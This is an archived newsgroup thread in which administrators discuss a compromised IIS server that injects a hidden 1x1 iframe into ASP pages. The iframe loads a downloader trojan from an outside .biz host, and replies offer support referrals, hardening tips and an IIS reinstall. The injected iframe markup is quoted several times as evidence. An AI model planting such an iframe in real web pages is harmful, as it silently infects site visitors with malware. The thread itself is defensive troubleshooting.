Our website was compromised sometime in the last few days, but our
Antivirus (Symantec Corporate) when run on the server doesn't detect it.

It is a Windows Server 2003 Standard server, running SP1 and all the
latest patches. IIS sends down a website to the user with IFRAMEs
injected into the HTML:

<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
width=1 height=1></iframe></TD></A></TR></TABLE></TD>

The iframe code above pointing to xaqjlyswly.biz does not come from our
code. I looked at the ASP function that generates this link and there
is nothing there that would put that on the page.

The iframe tries to get the user's browser to download the Downloader
virus which, according to Symantec "connects to the Internet and
downloads other Trojan horses"

http://www.symantec.com/security_response/writeup.jsp?docid= 2002-101518-4323-99

My local antivirus on my machine caught downloader getting installed
after browsing the site on the infected server.

I used Agent Ransack to look for the string ".biz" across all our
websites source code. The string wasn't found anywhere.

That all leads me to believe that something is getting injected into the
code before it is sent to the end user.

I found an older virus that has similar characteristics called
Download.Ject which infected IIS also. I followed Microsoft's
suggestions for detecting Download.Ject and we don't have it.

Any ideas?

Hi Paul,

I believe the current situation indicates your web server got
hacked/attacked.

For suck kind of urgent cases of Virus/Trojan, I would like to suggest that
you contact Microsoft Customer Service and Support services as well as some
third-party security and anti-virus services vendor like Symantec for
assistance. You can call our support center via telephone so that a
dedicated Support Professional can assist with this request.

To obtain the phone numbers for specific technology request please take a
look at the web site listed below.

http://support.microsoft.com/default.aspx?scid=fh;EN-US;PHON ENUMBERS

If you are outside the US please see http://support.microsoft.com for
regional support phone numbers.

Thanks.

Sincerely,

WenJun Zhang

Microsoft Online Community Support

==================================================

Get notification to my posts through email? Please refer to:
http://msdn.microsoft.com/subscriptions/managednewsgroups/de fault.aspx#notif
ications.

Note: The MSDN Managed Newsgroup support offering is for non-urgent issues
where an initial response from the community or a Microsoft Support
Engineer within 1 business day is acceptable. Please note that each follow
up response may take approximately 2 business days as the support
professional working with you may need further investigation to reach the
most efficient resolution. The offering is not appropriate for situations
that require urgent, real-time or phone-based interactions or complex
project analysis and dump analysis issues. Issues of this nature are best
handled working with a dedicated Microsoft Support Engineer by contacting
Microsoft Customer Support Services (CSS) at:

http://msdn.microsoft.com/subscriptions/support/default.aspx .

==================================================

This posting is provided "AS IS" with no warranties, and confers no rights.

We had the same problem on our windows 2003 server today.

We cannot find any information anywhere.

Any ideas???


Paul Oliver a =E9crit :

> Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it.
>
> It is a Windows Server 2003 Standard server, running SP1 and all the
> latest patches. IIS sends down a website to the user with IFRAMEs
> injected into the HTML:
>
> <TD><TABLE><TR><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self ><IMG
> NAME=3D"news194" SRC=3D"images/newsClip.png" ALT=3D"*" BORDER=3D0
> ></A></TD><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self
> CLASS=3D"ltblue"></a><iframe src=3Dhttp://xaqjlyswly.biz/dl/adv448.php
> width=3D1 height=3D1></iframe></TD></A></TR></TABLE></TD>
>
> The iframe code above pointing to xaqjlyswly.biz does not come from our
> code. I looked at the ASP function that generates this link and there
> is nothing there that would put that on the page.
>
> The iframe tries to get the user's browser to download the Downloader
> virus which, according to Symantec "connects to the Internet and
> downloads other Trojan horses"
>
> http://www.symantec.com/security_response/writeup.jsp?docid= 3D2002-101518=
-4323-99
>
> My local antivirus on my machine caught downloader getting installed
> after browsing the site on the infected server.
>
> I used Agent Ransack to look for the string ".biz" across all our
> websites source code. The string wasn't found anywhere.
>
> That all leads me to believe that something is getting injected into the
> code before it is sent to the end user.
>
> I found an older virus that has similar characteristics called
> Download.Ject which infected IIS also. I followed Microsoft's
> suggestions for detecting Download.Ject and we don't have it.
>
> Any ideas?

Post removed (X-No-Archive: yes)

We had to reinstall IIS on the server and it did the trick.

By the way, we tried windows defender and windows removing tools, both
didn't found anything. And after our tests, IIS was really compromise.
Any website running asp or aspx pages inject the iframe code. The hack
seems to have been at the core of IIS. ASAPI filter desactivation
didn't do the trick.

Any idea anyone what it was?


Leythos a =E9crit :

> In article <uelbG$kGHHA.924 [at] TK2MSFTNGP02.phx.gbl>,
> PaulOliver [at] noemail.noemail says...
> > Our website was compromised sometime in the last few days, but our
> > Antivirus (Symantec Corporate) when run on the server doesn't detect it.
> >
> > It is a Windows Server 2003 Standard server, running SP1 and all the
> > latest patches. IIS sends down a website to the user with IFRAMEs
> > injected into the HTML:
> >
> > <TD><TABLE><TR><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self ><IMG
> > NAME=3D"news194" SRC=3D"images/newsClip.png" ALT=3D"*" BORDER=3D0
> > ></A></TD><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self
> > CLASS=3D"ltblue"></a><iframe src=3Dhttp://xaqjlyswly.biz/dl/adv448.php
> > width=3D1 height=3D1></iframe></TD></A></TR></TABLE></TD>
> >
> > The iframe code above pointing to xaqjlyswly.biz does not come from our
> > code. I looked at the ASP function that generates this link and there
> > is nothing there that would put that on the page.
>
> The reason that Symantec didn't detect it on the server is because the
> threat (malware) is not on your server, it's on the remote server.
>
> > The iframe tries to get the user's browser to download the Downloader
> > virus which, according to Symantec "connects to the Internet and
> > downloads other Trojan horses"
> >
> > http://www.symantec.com/security_response/writeup.jsp?docid= 3D2002-1015=
18-4323-99
> >
> > My local antivirus on my machine caught downloader getting installed
> > after browsing the site on the infected server.
> >
> > I used Agent Ransack to look for the string ".biz" across all our
> > websites source code. The string wasn't found anywhere.
> >
> > That all leads me to believe that something is getting injected into the
> > code before it is sent to the end user.
> >
> > I found an older virus that has similar characteristics called
> > Download.Ject which infected IIS also. I followed Microsoft's
> > suggestions for detecting Download.Ject and we don't have it.
> >
> > Any ideas?
>
> Put a real firewall in front of your server, block all foreign subnets
> not required, rename the administrator account and disable all accounts
> not needed, patch the server, etc... Follow ALL of the recommendations
> that secure your server.
>
> What services, other than HTTP did you expose?
>
> --
>
> spam999free [at] rrohio.com
> remove 999 in order to email me

Post removed (X-No-Archive: yes)